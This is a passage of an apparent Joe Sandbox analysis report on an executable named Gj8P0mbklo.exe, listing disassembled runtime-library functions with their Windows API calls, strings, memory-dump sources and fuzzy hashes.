                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\Gj8P0mbklo.exe
                                                                                                                                                                                            • API String ID: 0-3216855326
                                                                                                                                                                                            • Opcode ID: 9fbcc4d7427ad1d38bebccf6ee648cd65bcb09164d35bfa7733aef9d12c28cab
                                                                                                                                                                                            • Instruction ID: d7d4e25acf808f6c79ce812bf03dd8edc6f0eb41e66d6e91596f9ee45955415e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9fbcc4d7427ad1d38bebccf6ee648cd65bcb09164d35bfa7733aef9d12c28cab
                                                                                                                                                                                            • Instruction Fuzzy Hash: A021927160030BAFDB22BF70CC81A6BB7ACBF003687118595F9298BA51E731EC10C7A0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00381747 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,145F793C,0037A97D,?,00000000,003953A1,000000FF,?,00381723,C95B5E5F,?,003816F7,0000000C), ref: 0038177C
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0038178E
                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,003953A1,000000FF,?,00381723,C95B5E5F,?,003816F7,0000000C), ref: 003817B0
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                            • Opcode ID: 1f93a9489c703e3fa96bc2f8f258620417fe321fc378246e0a990e31380d54ee
                                                                                                                                                                                            • Instruction ID: d93c36d0d745103c5440d2a8686df89e3578a6a7454d0beee76a47f6e6786ffc
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f93a9489c703e3fa96bc2f8f258620417fe321fc378246e0a990e31380d54ee
                                                                                                                                                                                            • Instruction Fuzzy Hash: A9018131945629EFDB139F54DC46BAEBBBCFB45B15F00062AF812E2390DB769901CB90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00364590 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 232COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 003647D9
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ___std_exception_copy
                                                                                                                                                                                            • String ID: Te9$parse error$parse_error
                                                                                                                                                                                            • API String ID: 2659868963-3911243356
                                                                                                                                                                                            • Opcode ID: a8abf5e322b904bb3df029666b2eb34c398ef9d2af15825a254042aa79f6de8f
                                                                                                                                                                                            • Instruction ID: 352db147d3f11f1bfc49aaa12ad70c345c7202cfb4f574b61a9a28448897c3e5
                                                                                                                                                                                            • Opcode Fuzzy Hash: a8abf5e322b904bb3df029666b2eb34c398ef9d2af15825a254042aa79f6de8f
                                                                                                                                                                                            • Instruction Fuzzy Hash: CF910271D102088BDB1ADFA8CC85BEDB7B5FF5A310F148618E414BB691E775AA84CB90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00356190 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 115COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ___std_exception_destroy.LIBVCRUNTIME ref: 00356291
                                                                                                                                                                                            • ___std_exception_destroy.LIBVCRUNTIME ref: 003562A0
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ___std_exception_destroy
                                                                                                                                                                                            • String ID: Te9$[json.exception.
                                                                                                                                                                                            • API String ID: 4194217158-3570959056
                                                                                                                                                                                            • Opcode ID: cd81e3ee0556c74dfb752473d1117bb762231468ced0938aedec34a2d472ca8b
                                                                                                                                                                                            • Instruction ID: 718cfef972f8a1bdd1b5c07a19c8ac73c78fc22174700e07906cd41f90d68824
                                                                                                                                                                                            • Opcode Fuzzy Hash: cd81e3ee0556c74dfb752473d1117bb762231468ced0938aedec34a2d472ca8b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2331483060030457CB2AAF28C843F6EB7EAAF54711F544A1DF8459B792DBB4EA8883D0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00379ABC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00379A6D,00000000,?,003A849C,?,?,?,00379C10,00000004,InitializeCriticalSectionEx,00397E1C,InitializeCriticalSectionEx), ref: 00379AC9
                                                                                                                                                                                            • GetLastError.KERNEL32(?,00379A6D,00000000,?,003A849C,?,?,?,00379C10,00000004,InitializeCriticalSectionEx,00397E1C,InitializeCriticalSectionEx,00000000,?,00378A70), ref: 00379AD3
                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00379AFB
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                            • API String ID: 3177248105-2084034818
                                                                                                                                                                                            • Opcode ID: ca2208af0249eb77a6e8c29887f0694d1a7837c6f6cccffe9e71d3d10215a63d
                                                                                                                                                                                            • Instruction ID: f5995e2cff28b9b7e6885b76e81b87f0e65597cc75a251321a9e7889923f1a9a
                                                                                                                                                                                            • Opcode Fuzzy Hash: ca2208af0249eb77a6e8c29887f0694d1a7837c6f6cccffe9e71d3d10215a63d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 53E04831248348BBDF221B65FC47F583A5CAB00B40F118121F90DA85E1D7779914C554
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00385288 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetConsoleOutputCP.KERNEL32(145F793C,00000000,00000000,?), ref: 003852EB
                                                                                                                                                                                              • Part of subcall function 0038A90C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,003897C0,?,00000000,-00000008), ref: 0038A96D
                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0038553D
                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00385583
                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00385626
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2112829910-0
                                                                                                                                                                                            • Opcode ID: 46727d9b4869b39f081ef66fe5f0b2545b7097f8b3977f51556429f9854087e2
                                                                                                                                                                                            • Instruction ID: 490be997d1658310669bdc7492cb4c7a733b3e3c2ff35e9ec01ee76acdd44cd0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 46727d9b4869b39f081ef66fe5f0b2545b7097f8b3977f51556429f9854087e2
                                                                                                                                                                                            • Instruction Fuzzy Hash: 59D16C75D046489FCF16DFA8D8809ADBBB9FF09314F28416AE416EB351E630A942CB50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0038E0CE Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 246COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: w@8$w@8$w@8
                                                                                                                                                                                            • API String ID: 0-3684850163
                                                                                                                                                                                            • Opcode ID: a1ff8a993611eab33035f6a17d53c3fef90db2c49b8d76f30211eb1b9ee47c9f
                                                                                                                                                                                            • Instruction ID: 0d1078c8936f3c65100f4ddd0f8d3e9c8da578d9378a4497bfb7a93165fa7668
                                                                                                                                                                                            • Opcode Fuzzy Hash: a1ff8a993611eab33035f6a17d53c3fef90db2c49b8d76f30211eb1b9ee47c9f
                                                                                                                                                                                            • Instruction Fuzzy Hash: E881E274A0035A9FDF22EF95C884ABFBBB8FF45310F1545A9E821A7241D7709E40CBA1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00378C67 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AdjustPointer
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1740715915-0
                                                                                                                                                                                            • Opcode ID: 3915b0be4dc6fb303a80523b208d1640220179db636755df34e436ff7124d8d1
                                                                                                                                                                                            • Instruction ID: 8e5a197392e90db4c5df2a3c31416cba4b75e0887eca479958f5128ac133d9c2
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3915b0be4dc6fb303a80523b208d1640220179db636755df34e436ff7124d8d1
                                                                                                                                                                                            • Instruction Fuzzy Hash: F051F376641602AFDB3B9F14C849BBAB3A5EF50310F15C52DE90D5B6D0EB39AC40C790
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00387407 Relevance: 6.1, APIs: 4, Instructions: 132COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: b6adef04e8faee3d5b4c39c4d48006f80b92a2e383d85b54fe15ca97bd74673a
                                                                                                                                                                                            • Instruction ID: c5ce562cfe313689f0884d826bf924da6592fbd3296929f9ee0110286de3a793
                                                                                                                                                                                            • Opcode Fuzzy Hash: b6adef04e8faee3d5b4c39c4d48006f80b92a2e383d85b54fe15ca97bd74673a
                                                                                                                                                                                            • Instruction Fuzzy Hash: DA412E72A04704AFD726BF38CC01B5ABFAAEB48710F20866AF055DF681D3B1D941C780
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 003898B8 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0038A90C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,003897C0,?,00000000,-00000008), ref: 0038A96D
                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0038991C
                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00389923
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 0038995D
                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00389964
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1913693674-0
                                                                                                                                                                                            • Opcode ID: 4c028ea6da08e95ab1bb453b9b010100174fab6ddae0719c82630970de5eb8d0
                                                                                                                                                                                            • Instruction ID: 0ffff38d2469afc5da2e0496a0a4f5f2ae54d8999b4a6bea264ba7dfd5948faf
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c028ea6da08e95ab1bb453b9b010100174fab6ddae0719c82630970de5eb8d0
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7221A171600305AFDB22BF668C81B3AB7ADFF05364B19845EF86A9B610DB35EC008790
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0038A9AF Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0038A9B7
                                                                                                                                                                                              • Part of subcall function 0038A90C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,003897C0,?,00000000,-00000008), ref: 0038A96D
                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0038A9EF
                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0038AA0F
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 158306478-0
                                                                                                                                                                                            • Opcode ID: e59c1c7e550665651f2cf5e0fb11070987ee6c429cff823d9aa2346725d9f71f
                                                                                                                                                                                            • Instruction ID: d23f254b708b3e86555aab703219736a56e769e335e09e4162f9b3bc29162cd2
                                                                                                                                                                                            • Opcode Fuzzy Hash: e59c1c7e550665651f2cf5e0fb11070987ee6c429cff823d9aa2346725d9f71f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2611EDF250AB197EB71737B25D8ACAF2E5CCE8439571204A6F902D5201EA389E0083B2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00393B37 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,?,0037A97D,00000000,00000000,?,003905EA,00000000,00000001,?,?,?,0038567A,?,00000000,00000000), ref: 00393B4E
                                                                                                                                                                                            • GetLastError.KERNEL32(?,003905EA,00000000,00000001,?,?,?,0038567A,?,00000000,00000000,?,?,?,00385C1D,?), ref: 00393B5A
                                                                                                                                                                                              • Part of subcall function 00393B20: CloseHandle.KERNEL32(FFFFFFFE,00393B6A,?,003905EA,00000000,00000001,?,?,?,0038567A,?,00000000,00000000,?,?), ref: 00393B30
                                                                                                                                                                                            • ___initconout.LIBCMT ref: 00393B6A
                                                                                                                                                                                              • Part of subcall function 00393ADE: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00393B0D,003905D7,?,?,0038567A,?,00000000,00000000,?), ref: 00393AF1
                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,?,0037A97D,00000000,?,003905EA,00000000,00000001,?,?,?,0038567A,?,00000000,00000000,?), ref: 00393B7F
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2744216297-0
                                                                                                                                                                                            • Opcode ID: 718ee88ac003f23ea67571d9dd91f0ba67ceb099b9f665681deea1b65a3bb9ef
                                                                                                                                                                                            • Instruction ID: 8c7728bf491d8502ed8f9c4a6d85145769cfbe186d40853c3ba8fa02f2aa995a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 718ee88ac003f23ea67571d9dd91f0ba67ceb099b9f665681deea1b65a3bb9ef
                                                                                                                                                                                            • Instruction Fuzzy Hash: BBF0C937545218BBCF236FD5DC0AA9E3F2AFB093B1F054415FA1996271C632CA60DB90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0038B590 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 352COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: Pp:$Pp:
                                                                                                                                                                                            • API String ID: 0-4107611570
                                                                                                                                                                                            • Opcode ID: 5314aa7033a982fc3b1682f1a4c5ee3261092e4aa34ec0d0cf9b5d823cb062a5
                                                                                                                                                                                            • Instruction ID: dbd009794b235818e122787acdfe73b0abe810b3c0d14d253bf4cfa65f128d18
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5314aa7033a982fc3b1682f1a4c5ee3261092e4aa34ec0d0cf9b5d823cb062a5
                                                                                                                                                                                            • Instruction Fuzzy Hash: F6B145B2940705AAEB21FFA5DC82FEBB7ECAB04700F1545A5FA15EF186E770D9048B50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 003669D0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 172COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 00366B87
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ___std_exception_copy
                                                                                                                                                                                            • String ID: Te9$out_of_range
                                                                                                                                                                                            • API String ID: 2659868963-956814458
                                                                                                                                                                                            • Opcode ID: 91c6ff3593477473e4bbcf98d3b0a800ad08e6d03e9a1d3e2291ce09eac5338c
                                                                                                                                                                                            • Instruction ID: 2edc7024bafe63b285a05de99b50250533cc3a68dc9561c5e5f960a6aaf58fce
                                                                                                                                                                                            • Opcode Fuzzy Hash: 91c6ff3593477473e4bbcf98d3b0a800ad08e6d03e9a1d3e2291ce09eac5338c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 28512871D102088BDB1EDFA8CC86BEEB775EF55300F10C61CE411BB696D778AA888B50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00379263 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
